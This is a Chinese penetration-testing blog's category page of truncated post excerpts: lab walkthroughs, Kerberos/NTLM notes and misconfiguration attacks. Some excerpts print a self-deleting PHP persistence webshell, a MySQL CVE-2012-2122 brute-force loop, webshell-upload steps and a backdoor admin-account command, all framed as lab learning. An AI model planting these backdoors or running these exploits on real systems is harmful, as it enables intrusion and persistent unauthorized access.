分类 渗透测试&内网安全 下的文章
渗透测试&内网安全 2020-05-05
  • 660
  • 0
  • WindowsWindows下常用日志路径1.安全日志文件:%systemroot%\system32\config\SecEvent.EVT; 2.系统日志文件:%systemroot%\system32\config\SysEvent.EVT; 3.应用程序日志文件:%systemroot%\system32\config\AppEvent.EVT; 4.DNS日志:%systemroot%\system32\config\DnsEvent.EVT; 5.Internet信息服务FTP日志默认位置:%systemroot%\system32\logfiles\msftpsvc1\ (默认每天一个日志) 6.Internet信息服务WWW日志默认位置:%systemroot%\system32\logfiles\w3svc1\ (默认每天一个日志) 7.Scheduler计划任务服务日志
    渗透测试&内网安全 2020-05-03
  • 812
  • 0
  • 前言&靶机简介这个靶机是当时有个项目的内容,但是因为一些原因没有去,看了一下这个靶机,挺多漏洞,知识点很广,所以决定自己来打一遍,算是复习一些很久前的知识点,就从一个端口一个端口来渗透吧,看看有什么知识点端口扫描25端口用户名枚举为啥先这个端口呢,因为后面要渗透21和22端口很大可能会爆破,25端口版本为Postfix smtpd,可以进行用户名枚举,为后面爆破提供方便存在root、typhoon、admin这三个用户未授权访问使用nc连接25端口不过貌似不能发邮件21端口首先在网上搜了一下vsftpd 3.0.2这个版本有没有什么漏洞,没有结果,于是尝试一些通用的基本操作ftp匿名访问探测了一下发现存在ftp匿名访问于是登录一下,查看当前路径及列目录尝试上传文件发现权限不允许,所以21端口暂时没有其它利用方式ftp爆破因为知道了存在以上用户,所以使用hydra爆破得到了typhoon的密
    渗透测试&内网安全 2020-03-31
  • 840
  • 0
  • 什么是委派如果在一个域中,A使用Kerberos身份验证访问服务B,B再使用A的身份去访问C,这个过程就可以理解为委派,委派主要分为非约束委派(Unconstrained delegation)和约束委派(Constrained delegation)两种,只有当A有权限访问C的时候才能委派成功,因为B使用的是A的身份去访问C非约束委派非约束委派在Kerberos中实现时,User会从KDC处得到的TGT发送给委派对象Service1,Service1拿到TGT后可以通过TGT访问域内任意其它服务,所以被称为非约束委派实现流程图如下(图来自微软手册)1.用户通过发送KRB_AS_REQ消息请求可转发 TGT(forwardable TGT,为了方便我们称为TGT1)。 2.KDC在KRB_AS_REP消息中返回TGT1。 3.用户再通过TGT1向KDC请求转发TGT(forwarded
    渗透测试&内网安全 2020-03-27
  • 1088
  • 1
  • 前言虽然学习了一段时间域渗透,之前也学过一点Kerberos协议,但是发现理解得还是不到位,有的也还不清楚,所以重新总结学习一下,龙哥(Loong716)文章写得真详细,嫖嫖~~,此文摘自:https://loong716.top/2019/10/25/Windows-hash.html,些许改动和补充总结NTLMNTLM(NT LAN Manager)是Windows中最常见的身份认证方式,主要有本地认证和网络认证两种情况NTLM hashNTLM hash是NTLM认证中最重要的凭证,它的由来是密码->十六进制编码->Unicode编码->md4加密->NTLM hash本地认证在本地认证过程中,当用户进行注销、重启、开机等需要认证的操作时,首先Windows会调用winlogon.exe进程(也就是我们平常见到的登录框)接收用户的密码之后密码会被传送给进程ls
    渗透测试&内网安全 2020-03-14
  • 1025
  • 0
  • 前言Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。Nishang被广泛应用于渗透测试的各个阶段,项目地址:https://github.com/samratashok/nishang模块介绍目录结构如下根据名字就大概知道有哪些功能,一张图表示安装导入Nishang框架下载好后进入nishang目录,然后进行导入,警告忽略PowerShell基本命令及介绍基本命令及基础知识常用文件操作命令| 命令 | 说明 || New-Item | 创建文件或文件夹 || mv | 移动文件 || cp | 复制文件 | |
    渗透测试&内网安全 2020-03-04
  • 2026
  • 1
  • 环境搭建该靶机是红日安全团队出的域渗透靶机ip情况如下kali linux:192.168.157.129 WEB(ubuntu):192.168.157.128(外) 192.168.183.129(内) win7:192.168.183.128 DC(windows2008):192.168.183.130进入WEB主机,需要手动使用docker开启服务,分别是strtus2-045、cve-2017-12615、cve-2018-12613使用docker需要使用sudo否则没有权限使用,开启后情况如下拿下webshell访问http://192.168.157.128:2002/发现是Tomcat,使用CVE-2017-12615直接put一个冰蝎马上去访问一下http://192.168.157.128:2002/shell.jsp,shell已经成功上传使用冰蝎成功连接,是ro
    渗透测试&内网安全 2020-02-20
  • 4450
  • 0
  • CVE-2012-2122 Mysql身份认证漏洞影响版本Mysql在5.5.24之前MariaDB也差不多这个版本之前漏洞原理只要知道用户名,不断尝试就能够直接登入SQL数据库,按照公告说法大约256次就能够蒙对一次漏洞复现msf利用hash解密得到密码即可登录python exp#!/usr/bin/python import subprocess while 1: subprocess.Popen("mysql -u root -p -h 192.168.0.16 --password=test", shell=True).wait()shell expfor i in `seq 1 1000`; do mysql -u root -p -h 192.168.0.16 --password=bad 2>/dev/null; doneMysq
    渗透测试&内网安全 2020-02-10
  • 1307
  • 0
  • 漏洞说明该漏洞可以允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限漏洞原理Kerberos协议中加入了PAC(Privilege Attribute Certificate特权专属证书),PAC中记录了用户信息以及权限信息,KDC和Server依据PAC里的权限信息控制用户的访问。服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控DC验证pac的话,那么客户端可以伪造域管的权限来访问服务器漏洞利用前提没有打ms14-068的补丁KB3011780攻击者拿下了一台域内的普通计算机,并获得普通域用户以及密码/hash值,以及用户的SID实验环境域控制器(DC) windows 2012 de1ay.com 10.10.10.10域成员主机 windows 7 10.10.10.201漏洞复现首先在域控制器上使用systeminfo查看是否有ms14-068的补
    渗透测试&内网安全 2020-02-09
  • 3715
  • 3
  • 环境搭建该靶机是红日安全团队出的域渗透靶机内外网搭建参考我的上一篇文章,搭建好后ip情况如下攻击机kali linux:192.168.111.2WEB(windows 2008):192.168.111.80(外) 10.10.10.80(内)DC(windows 2012):10.10.10.10PC(win7):192.168.111.201(外) 10.10.10.201(内)拿webshell该网站是Weblogic的容器,直接使用WeblogicScan扫描一下可能存在的漏洞等,效果图如下发现控制台路径是http://192.168.111.3:7001/console/login/LoginForm.jsp账号密码为de1ayadministrator(经尝试发现账号密码不正确。)可能存在CVE-2019-2725、CVE-2019-2729直接打开msf使用CVE-2019
    渗透测试&内网安全 2020-02-08
  • 758
  • 0
  • net time /domain 有三种情况:第一种如果存在域会从域控返回时间,并在第一行返回域控及域名;第二种如果当前当前服务器在域内但当前用户非域用户,则会返回System error 5就表示权限不够;最后一种就是返回“找不到域WORKGROUP的域控制器”表示当前网络环境为工作组而不存在域ipconfig /all 查看当前网络的DNS,一般在内网DNS服务器即为域控,很少将DNS与域控分开,除非内网很大存在多域环境systeminfo 系统信息当中含有两项:Domain和Logon Server,Domain即为域名,Logon Server为域控,但如果Domain显示为WORKGROUP则当前服务器不在域内net user /domain查询所有域用户net group /domain获得所有域用户组列表net group "domain admins" /domain获得指
    渗透测试&内网安全 2020-02-02
  • 2928
  • 1
  • 环境搭建该靶机是红日安全团队出的域渗透靶机VM1是win7是Web服务器VM2是windows2003是域成员VM3是windows2008是域控在虚拟机网络编辑器中添加一个VMnet2来模拟内网环境,设置如下win7的网络配置如下设置两块网卡,VMnet1用于连接外网,VMnet2让它处于内网同理windows2003和windows2008网络适配器都选择VMnet2这样这三台的内网环境就搭建好了,自己的攻击机kali网络适配器也设置为VMnet1最后ip如下kali:192.168.225.128 win7:192.168.52.143(内) 192.168.225.129(外) windows2003:192.168.52.141 windows2008:192.168.52.138打开Win7的phpstudy开始渗透之旅拿下webshell扫描一下网站目录发现都有目录遍历,暂时
    渗透测试&内网安全 2020-01-31
  • 1369
  • 0
  • 前言在getshell后,往往因为内网渗透的需要不得不长时间对目标进行持续威胁(简称APT)。因此需要进行权限维持,隐藏后门,本文偏windows系统Web后门不死马<?php set_time_limit(0); //PHP脚本限制了执行时间,set_time_limit(0)设置一个脚本的执行时间为无限长 ignore_user_abort(1); //ignore_user_abort如果设置为 TRUE,则忽略与用户的断开,脚本将继续运行。 unlink(__FILE__); //删除自身 while(1) { file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //创建shell.php,这里最好用免杀的一句话 sleep(0); //间隔时间 }
    渗透测试&内网安全 2020-01-15
  • 1203
  • 0
  • 端口转发LCX端口转发(Windows)LCX有两大功能:端口转发(listen和slave成对使用)、端口映射(tran)内网端口转发到公网1.内网主机上执行:lcx.exe –slave 公网主机ip 公网主机端口 内网主机ip 内网主机端口例如lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389意思是把内网主机的3389端口转发到具有公网ip主机的4444端口2.公网主机 上执行 Lcx.exe –listen 公网主机端口1 公网主机端口2例如lcx.exe –listen 4444 5555意思是监听公网主机本机的4444端口请求,并将来自4444端口的请求传送给5555端口这个时候在公网主机打开远程桌面连接127.0.0.1:5555即可连接内网主机的远程桌面本地转发由于防火墙限制,部分端口如3389无法通过防火墙,此时可以将该目标主机的3389端
    渗透测试&内网安全 2019-12-25
  • 1526
  • 0
  • 应用简介Docker是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台Docker漏洞简介Docker Remote API 是一个取代远程命令行界面(rcli)的REST API。存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API,通过这个接口,我们可以新建 container,删除已有container,甚至是获取宿主机的shell测试环境attacker:kali linuxvictim:vluhub里面的dockerdocker常用删除命令删除容器rm + 容器id删除镜像rmi + 镜像iddocker run常见命令
    渗透测试&内网安全 2019-12-24
  • 1536
  • 0
  • 应用简介rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口漏洞简介由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件,rsync未授权访问带来的危害主要有两个:一是造成了严重的信息泄露;二是上传脚本后门文件,远程命令执行测试环境attacker:kali linuxvictim:vulhub里面的rsyncrsync基本命令列出模块rsync rsync://192.168.1.107:873/列出模块src下的文件rsync rsync://192.168.1.107:873/src下载文件,比如下载rsync下的配置文件rsyncd.conf另存为本地/root/1.confrsync -av rsync://192.168.1.107:873/src/etc/rsyncd.con
    渗透测试&内网安全 2019-12-10
  • 1329
  • 0
  • 测试环境攻击机:kali linux 192.168.43.127靶机:192.168.43.5主机发现nmap -sn 192.168.43.1/24端口扫描nmap -sV 192.168.43.5 -p-信息收集因为是本地的,所以云悉指纹什么的cms识别无法运行,先来whatweb吧在网站末尾发现如下在网上搜索一下Colorlib发现它是wordpress下的一款主题点击网页上的blog,发现确实是wordpress,发现wp-admin进不去后台目录扫描,没什么东西这个时候就使用wpscanwpscan常用命令更新wpscan漏洞库 wpscan -update 查看网站用户 wpscan --url http://192.168.43.5/wordpress --enumerate u 查看当前主题 wpscan --url http://192.168.43.5/wordpre
    渗透测试&内网安全 2019-12-09
  • 833
  • 0
  • 测试环境攻击机:kali linux 192.168.43.127靶机:192.168.43.253主机发现执行命令nmap -sn 192.168.43.1/24端口扫描执行命令nmap 192.168.43.235 -p-信息收集一打开是一张图片,F12没有任何东西,扫描目录打开secret目录又是一张图片,没有发现任何利用价值whatweb查询一下,信息也挺少的80端口貌似没有可以利用的点转战ftp端口ftp常用命令1.登录ftp方法一:直接输入ftp+ip ftp ip方法二:直接输入ftp,进入ftp服务后输入open+ip open ip2.查看ftp服务器上的文件ls和dir,dir命令可以使用通配符3.下载文件get:下载指定文件get filename [newname](filename为下载的FTP服务器上的文件名,newname为保存在本都计算机上时使用的
    渗透测试&内网安全 2019-12-08
  • 871
  • 0
  • 测试环境攻击机:kali linux 192.168.1.109靶机:192.168.1.103主机发现使用命令nmap -sn 192.168.1.1/24端口扫描使用命令nmap 192.168.1.103 -p-信息收集发现有80端口但是进去没意义,1898端口进去就是网页,在网页底部发现是drupal的cms用whatweb继续收集信息,得到php版本,apache版本,服务器系统版本等目录扫描,目录均存在目录遍历拿webshell根据目录扫描内容看到存在install.php猜想能够通过网站重新安装拿webshell,尝试一下发现必须要删除数据库才能重新安装,所以走另一条思路已经知道网站的cms为Drupal7,在网上搜索到存在cve-2018-7600 Drapul6.x、7.x、8.x远程代码执行漏洞,所以试一试,进入msf,搜索drupal利用这一项,设置好参数后拿到web
    渗透测试&内网安全 2019-12-05
  • 896
  • 0
  • 应用简介redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)和zset(有序集合)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步。漏洞简介Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。如果Redis以root
    渗透测试&内网安全 2019-11-18
  • 1011
  • 0
  • 解析漏洞漏洞简介:对于任意文件名,在后面加上/任意文件名.php后该文件就会以php格式进行解析,是用户配置不当造成的漏洞复现:在网站根目录新建test.jpg,里面写入phpinfo(),打开试一下试一试Nginx的解析漏洞,在后面加上/x.php对于低版本的php能够直接解析成功,高版本php因为引入了security.limit_extensions,限制了可执行文件的后缀,默认只允许执行.php文件,这里来看看两个与Nginx解析漏洞相关的核心配置核心配置:cgi.fix_pathinfo该选项位于配置文件php.ini中,默认值为1,表示开启。当php遇到文件路径/aaa.xxx/bbb.yyy/ccc.zzz时,若/aaa.xxx/bbb.yyy/ccc.zzz不存在,则会去掉最后的/ccc.zzz,然后判断/aaa.xxx/bbb.yyy是否存在,若存在,则把/aaa.xxx
    渗透测试&内网安全 2019-11-17
  • 1499
  • 0
  • 首发先知社区:https://xz.aliyun.com/t/6783PUT漏洞前提条件:IIS 6.0开启了WebDAV并且拥有IIS来宾用户拥有写入权限复现过程:用IIS PUT SCANNER探测一下目标IIS是否拥有写入权限是YES所以可以利用先看原来的服务器上面存在的内容我们利用另一个工具对文件进行写入,我们写入一句话webshell上传test.txt成功上传上去是txt格式,于是我们用MOVE或者COPY选项把它改成asp后缀菜刀连一下,拿到webshell提权上传cmd.exe和pr.exe上去,这二者的用法是pr提权执行下面这条命令,把当前终端的执行程序设置成我们上传的 cmd.exesetp "路径cmd.exe"然后我们就可以pr提权,查看一下当前是system权限于是我们新建管理员账户pr.exe "net user hack1 123
    渗透测试&内网安全 2019-10-14
  • 2353
  • 1
  • 主机渗透系统:kali linux靶机:DC-3渗透过程:先老规矩nmap扫描存活主机再扫描靶机端口访问一下页面,然后用dirb扫描一下目录得到登录界面administrator,是Joomla建站系统于是用joolscan扫描一下网站,得到Joomla版本在sploitsearch中搜索一下有不有现成的漏洞可以利用,发现有一个SQL注入漏洞查看一下漏洞详细,直接用sqlmap跑,成功最后在joomladb数据库#__users表里面查到账号密码,密码是hash加密后的结果用john暴力破解得到明文密码snoopy于是登录进后台,发现可以修改网页源代码于是用weevely生成php后门文件复制代码新建webshell.php文件,粘贴代码,保存然后用weevely连,成功拿到shell查看当前内核版本在网上搜索了一下,这是Ubuntu 16.04版本在searchsploit里面搜索一下这
    渗透测试&内网安全 2019-10-14
  • 1015
  • 0
  • 主机渗透系统:kali linux靶机:DC-2渗透过程:先扫网段内存活主机,发现192.168.1.41是靶机ip扫描靶机所有开放的端口然后访问80端口的服务,这里根据靶机下载页面上面的提示需要设置hosts文件访问页面是一个wordpess,找到flag1它提示登录找到下一个flag,也提示了cewl,于是就用cewl爬一波密码出来,保存在根目录然后用专门针对wordpress的工具wpscan来扫描所有用户名wpscan --url http://dc-2 --enumerate u (这一步可以不做,直接跳下一步)然后用之前得到的密码来爆破 wpscan --url http://dc-2 -P password.txt 得到jerry和tom的密码因为我博客用的wordpress,所以知道后台是wp-admin,不知道也可以用dirb扫出来两个账号都登陆一下,发现jerry
    渗透测试&内网安全 2019-10-14
  • 1110
  • 0
  • 下载地址:https://www.vulnhub.com/entry/dc-1-1,292/主机渗透系统:kali linux渗透过程:nmap全扫存活主机及端口 nmap -sV 192.168.1.1/24进入靶机80端口的网站,发现是drupal cms,用御剑或者dirb扫描网站目录没有发现有敏感文件,于是使用msf查找该cms有哪些可利用的漏洞发现2018年那个漏洞可以直接利用,连接成功进入shell,查看目录发现flag1.txt,打开提示信息说每个cms都有一个配置文件,于是猜测第二个flag藏在配置文件里面,最后在/var/www/sites/default/settings.php里面找到flag2.txt查看flag2.txt发现里面有数据库的各种信息得到信息后连接mysql数据库,发现连接不上,于是暂时搁置换一个思路linux下有两个存放密码的路径,/etc/pass
    渗透测试&内网安全 2019-10-14
  • 1208
  • 0
  • ARP协议地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。ARP欺骗的局限性只能攻击同一局域网下的主机需要用到的工具kali linux下的arpsproof和driftnet以及wiresharkARP欺骗原理ARP欺骗有两种攻击利用方式1.ARP欺骗断网攻击攻击者欺骗受害主机,发送数据告诉受害主机说我是网关,然后受害主机会将攻击主机当作网关进行数据传输,这样就会导致受害主机无法正常上网。2.ARP中间人攻击攻击主机欺骗受害主机,发送数据告诉受害主机说我是网关,然后受害主机会将攻击主机当作网关进行数据传输。同时发送数据告诉网关说我是受害主机,网关会将攻击主机当作受害主机进行数据传输,这样受害主机和网关之间的数据交互都会经过攻击主机,受害主机不会断网不会察觉,所以可以查看到各种通信数据。测试环境攻击主机系统
    渗透测试&内网安全 2019-10-14
  • 854
  • 0
  • 文章首发先知社区:https://xz.aliyun.com/t/6386最近接触到利用badsub进行攻击的方法,于是自己研究了一波,先给出一个badusb木马远控案例。badusb简介badusb是一种类似于U盘,插入后就会自动执行里面的恶意代码进行恶意操作,由于恶意代码是存在badusb存放固件的区域中,所以杀毒软件和U盘格式化都不能防御badusb的攻击badusb基本语法和arduino按键代码入门badusb参考视频教程:https://www.bilibili.com/video/av20517610?from=search&seid=10154231350179524417delay(5000);//延时毫秒 Keyboard.begin(); //开始键盘通讯 Keyboard.end(); //结束键盘通讯 Keyboard.press(); //按下键盘按键 如果是